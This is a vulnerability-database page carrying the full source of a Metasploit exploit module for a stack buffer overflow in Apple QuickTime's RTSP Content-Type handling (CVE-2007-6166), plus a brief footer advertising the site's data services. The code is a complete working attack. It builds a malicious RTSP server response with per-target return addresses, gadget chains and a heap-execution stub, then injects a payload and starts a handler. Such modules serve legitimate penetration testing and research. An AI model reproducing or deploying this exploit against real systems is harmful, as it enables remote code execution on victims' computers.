Lucene search
K

MacOS X QuickTime RTSP Content-Type Overflow

🗓️ 18 Mar 2009 23:28:24Reported by unknownType 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

MacOS X QuickTime RTSP Content-Type Overflow. Stack-based buffer overflow in Apple QuickTime before version 7.3.1 allows execution of arbitrary code

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
      'Description' => %q{
        This module exploits a stack-based buffer overflow in Apple QuickTime
        before version 7.3.1. By sending an overly long RTSP response to a
        client, an attacker may be able to execute arbitrary code.
      },
      'Author' => 'unknown',
      'Platform' => 'osx',
      'References' =>
        [
          [ 'CVE', '2007-6166' ],
          [ 'OSVDB', '40876'],
          [ 'BID', '26549' ],
        ],
      'Payload' =>
        {
          'Space' => 3841,
          'BadChars' => "\x00\x0a\x0d",
          'MaxNops' => 0,
          'StackAdjustment' => -3500,
        },
      'Targets' =>
        [
          [ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
            {
              'Arch' => ARCH_PPC,
              'Ret' => 0x8fe3f88c,
              'RetOffset' => 551,
              'PayloadOffset' => 879
            }
          ],

          [ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
            {
              'Arch' => ARCH_PPC,
              'Ret' => 0x8fe042e0,
              'RetOffset' => 615,
              'PayloadOffset' => 3351
            }
          ],

          [ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
            {
              'Arch' => ARCH_X86,
              'Offset' => 307,
              'Writable' => 0xa0bd0f10,    # libSystem __IMPORT
              # The rest of these are all in libSystem __TEXT
              'ret' => 0x9015d336,
              'poppopret' => 0x9015d334,
              'setjmp' => 0x900bc438,
              'strdup' => 0x90012f40,
              'jmp_eax' => 0x9014a77f
            }
          ],

          [ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
            {
              'Arch' => ARCH_X86,
              'Offset' => 307,
              'Writable' => 0x8fe66448,  # dyld __IMPORT
              # The rest of these addresses are in dyld __TEXT
              'ret' => 0x8fe1ceee,
              'poppopret' => 0x8fe220d7,
              'setjmp' => 0x8fe1ceb0,
              'strdup' => 0x8fe1cd77,
              'jmp_eax' => 0x8fe01041
            }
          ],

        ],
      'DefaultTarget'  => 2,
      'DisclosureDate' => '2007-11-23'))
  end

  ######
  # XXX: This does not work on Tiger apparently
  def make_exec_payload_from_heap_stub()
    frag0 =
      "\x90" + # nop
      "\x58" + # pop eax
      "\x61" + # popa
      "\xc3"   # ret

    frag1 =
      "\x90" +             # nop
      "\x58" +             # pop eax
      "\x89\xe0" +         # mov eax, esp
      "\x83\xc0\x0c" +     # add eax, byte +0xc
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax
      "\xc3"               # ret

    setjmp = target['setjmp']
    writable = target['Writable']
    strdup = target['strdup']
    jmp_eax = target['jmp_eax']

    exec_payload_from_heap_stub =
      frag0 +
      [setjmp].pack('V') +
      [writable + 32, writable].pack("V2") +
      frag1 +
      "X" * 20 +
      [setjmp].pack('V') +
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +
      "X" * 4
  end

  def on_client_connect(client)
    print_status("Got client connection...")

    if (target['Arch'] == ARCH_PPC)
      ret_offset = target['RetOffset']
      payload_offset = target['PayloadOffset']

      # Create pattern sized up to payload, since it always follows
      # the return address.
      boom = Rex::Text.pattern_create(payload_offset)

      boom[ret_offset, 4] = [target['Ret']].pack('N')
      boom[payload_offset, payload.encoded.length] = payload.encoded
    else
      boom = Rex::Text.pattern_create(327)

      boom[307, 4] = [target['ret']].pack('V')
      boom[311, 4] = [target['ret']].pack('V')
      boom[315, 4] = [target['poppopret']].pack('V')
      boom[319, 4] = [target['Writable']].pack('V')
      boom[323, 4] = [target['Writable']].pack('V')

      #
      # Create exec-payload-from-heap-stub, but split it in two.
      # The first word must be placed as the overwritten saved ebp
      # in the attack string.  The rest is placed after the
      # Writable memory addresses.
      #
      magic = make_exec_payload_from_heap_stub()
      boom[303, 4] = magic[0, 4]
      boom += magic[4..-1]

      #
      # Place the payload immediately after the stub as it expects
      #
      boom += payload.encoded
    end

    body = " "
    header =
      "RTSP/1.0 200 OK\r\n"+
      "CSeq: 1\r\n"+
      "Content-Type: #{boom}\r\n"+
      "Content-Length: #{body.length}\r\n\r\n"

    print_status("Sending RTSP response...")
    client.put(header + body)

    print_status("Sleeping...")
    select(nil,nil,nil,1)

    print_status("Starting handler...")
    handler(client)

    print_status("Closing client...")
    service.close_client(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jan 2021 23:29Current
0.7Low risk
Vulners AI Score0.7
CVSS 29.3
EPSS0.41916
19